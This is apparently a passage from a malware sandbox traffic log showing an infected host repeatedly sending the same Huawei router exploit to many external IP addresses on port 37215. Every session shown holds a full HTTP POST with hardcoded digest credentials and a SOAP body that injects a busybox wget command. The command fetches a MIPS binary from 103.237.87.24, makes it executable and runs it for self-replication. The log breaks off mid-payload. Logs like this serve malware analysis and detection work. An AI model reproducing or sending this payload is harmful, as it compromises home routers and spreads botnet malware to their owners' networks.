                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  324192.168.2.134957641.72.224.22937215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:56.099519014 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  325192.168.2.1353122197.205.23.16137215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:56.099534988 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  326192.168.2.136000441.12.20.20137215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:56.099541903 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  327192.168.2.1349862157.62.46.21237215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:56.099553108 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  328192.168.2.1337324160.68.2.13637215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:56.099575996 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  329192.168.2.133586241.48.115.12837215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:56.099576950 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  330192.168.2.1340082102.145.183.22037215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:56.099594116 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  331192.168.2.1338964197.231.246.14937215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:56.099596024 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  332192.168.2.1343680197.192.3.1237215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:56.099620104 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  333192.168.2.1346294157.76.216.6937215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:56.099625111 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 